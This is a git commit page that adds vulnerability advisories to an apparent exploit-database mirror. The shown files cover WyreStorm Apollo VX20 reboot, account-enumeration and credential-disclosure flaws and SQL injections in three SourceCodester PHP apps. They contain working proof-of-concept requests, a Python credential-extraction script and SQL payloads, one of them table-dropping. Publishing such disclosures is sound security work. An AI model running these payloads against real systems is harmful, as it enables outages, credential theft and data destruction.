Merge remote-tracking branch 'upstream/main'

CERTCC · Feb 27, 2024 · 8c880c1 · 8c880c1
2 parents 59ccc8c + 9734fce
commit 8c880c1
Show file tree

Hide file tree

Showing 12 changed files with 730 additions and 0 deletions.
diff --git a/exploits/multiple/dos/51815.txt b/exploits/multiple/dos/51815.txt
@@ -0,0 +1,63 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.wyrestorm.com
+
+
+[Product]
+APOLLO VX20 < 1.3.58
+
+
+[Vulnerability Type]
+Incorrect Access Control (DOS)
+
+
+[Affected Product Code Base]
+APOLLO VX20 < 1.3.58, fixed in v1.3.58
+
+
+[Affected Component]
+Web interface, reboot and reset commands
+
+
+[CVE Reference]
+CVE-2024-25736
+
+
+[Security Issue]
+An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.
+
+
+[Exploit/POC]
+curl -k https://192.168.x.x/device/reboot
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: January 18, 2024
+Vendor released fixed firmware v1.3.58: February 2, 2024
+February 11, 2024 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
diff --git a/exploits/multiple/remote/51814.txt b/exploits/multiple/remote/51814.txt
@@ -0,0 +1,63 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.wyrestorm.com
+
+
+[Product]
+APOLLO VX20 < 1.3.58
+
+[Vulnerability Type]
+Account Enumeration
+
+
+[CVE Reference]
+CVE-2024-25734
+
+
+[Security Issue]
+An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered.
+Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account.
+
+
+[Exploit/POC]
+TELNET x.x.x.x 23
+username:aa
+username:bb
+username:admin
+password:
+
+
+[Network Access]
+Remote
+
+
+[Affected Product Code Base]
+APOLLO VX20 - < 1.3.58, fixed in v1.3.58
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: January 18, 2024
+Vendor released fixed firmware v1.3.58: February 2, 2024
+February 11, 2024 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
diff --git a/exploits/multiple/remote/51816.txt b/exploits/multiple/remote/51816.txt
@@ -0,0 +1,83 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.wyrestorm.com
+
+
+[Product]
+APOLLO VX20 < 1.3.58
+
+
+[Vulnerability Type]
+Incorrect Access Control (Credentials Disclosure)
+
+
+[Affected Component]
+Web interface, config
+
+
+[Affected Product Code Base]
+APOLLO VX20 < 1.3.58, fixed in v1.3.58
+
+
+[CVE Reference]
+CVE-2024-25735
+
+
+[Security Issue]
+An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
+Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
+The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config
+
+E.g. HTTP response snippet:
+
+:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"}
+,"softAp":{"password":"12345678","router":"y","softAp":"y"}...
+
+
+[Exploit/POC]
+import requests
+
+target="https://x.x.x.x"
+res = requests.get(target+"/device/config", verify=False)
+
+idx=res.content.find('{"password":')
+if idx != -1:
+    idx2=res.content.find('router')
+    if idx2 != -1:
+        print("[+] CVE-2024-25735 Credentials Disclosure")
+        print("[+] " + res.content[idx + 1:idx2 + 11])
+        print("[+] hyp3rlinx")
+else:
+    print("[!] Apollo vX20 Device not vulnerable...")
+
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: January 18, 2024
+Vendor released fixed firmware v1.3.58: February 2, 2024
+February 11, 2024 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
diff --git a/exploits/php/remote/51808.txt b/exploits/php/remote/51808.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Simple Inventory Management System v1.0 -  'email'  SQL Injection
+# Google Dork: N/A
+# Application: Simple Inventory Management System
+# Date: 26.02.2024
+# Bugs: SQL Injection
+# Exploit Author: SoSPiro
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Windows 10 64 bit Wampserver
+# CVE : N/A
+
+
+## Vulnerability Description:
+
+This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.
+
+
+## Proof of Concept (PoC):
+
+An example attacker could input the following values:
+
+email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'
+pwd: test
+
+This would result in the following SQL query:
+
+SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'
+
+This attack would retrieve all users, making the login process always successful.
+
+request-response foto:https://i.imgur.com/slkzYJt.png
+
+
+## Vulnerable code section:
+====================================================
+ims/login.php
+
+<?php
+ob_start();
+session_start();
+include('inc/header.php');
+$loginError = '';
+if (!empty($_POST['email']) && !empty($_POST['pwd'])) {
+	include 'Inventory.php';
+	$inventory = new Inventory();
+
+	// Vulnerable code
+	$login = $inventory->login($_POST['email'], $_POST['pwd']);
+	//
+
+if(!empty($login)) {
+		$_SESSION['userid'] = $login[0]['userid'];
+		$_SESSION['name'] = $login[0]['name'];
+		header("Location:index.php");
+	} else {
+		$loginError = "Invalid email or password!";
+	}
+}
+?>
+
+
+
+## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html
diff --git a/exploits/php/remote/51812.txt b/exploits/php/remote/51812.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection
+# Google Dork: N/A
+# Application: Flashcard Quiz App
+# Date: 25.02.2024
+# Bugs: SQL Injection
+# Exploit Author: SoSPiro
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Windows 10 64 bit Wampserver
+# CVE : N/A
+
+
+## Vulnerability Description:
+
+The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
+
+
+## Proof of Concept (PoC):
+
+This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.
+
+1. Original Code:
+
+$card = $_GET['card'];
+
+$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
+
+2. Payload:
+
+' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
+
+3. Injected Query:
+
+DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
+
+Request Response foto: https://i.imgur.com/5IXvpiZ.png
+
+
+## Vulnerable code section:
+====================================================
+endpoint/delete-flashcard.php
+
+$card = $_GET['card'];
+
+$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
diff --git a/exploits/php/remote/51813.txt b/exploits/php/remote/51813.txt
@@ -0,0 +1,48 @@
+# Exploit Title: FAQ Management System v1.0 - 'faq' SQL Injection
+# Google Dork: N/A
+# Application: FAQ Management System
+# Date: 25.02.2024
+# Bugs: SQL Injection
+# Exploit Author: SoSPiro
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Windows 10 64 bit Wampserver
+# CVE : N/A
+
+
+## Vulnerability Description:
+
+The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.
+
+
+## Proof of Concept (PoC):
+
+An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:
+
+1. Original Request:
+http://example.com/endpoint/delete-faq.php?faq=123
+
+2.Malicious Request (SQL Injection):
+http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --
+
+This would result in a query like:
+
+DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --
+
+Which can lead to the deletion of data or even the entire table.
+
+
+poc foto: https://i.imgur.com/1IENYFg.png
+
+
+## Vulnerable code section:
+====================================================
+endpoint/delete-faq.php
+
+
+$faq = $_GET['faq'];
+
+// ...
+
+$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";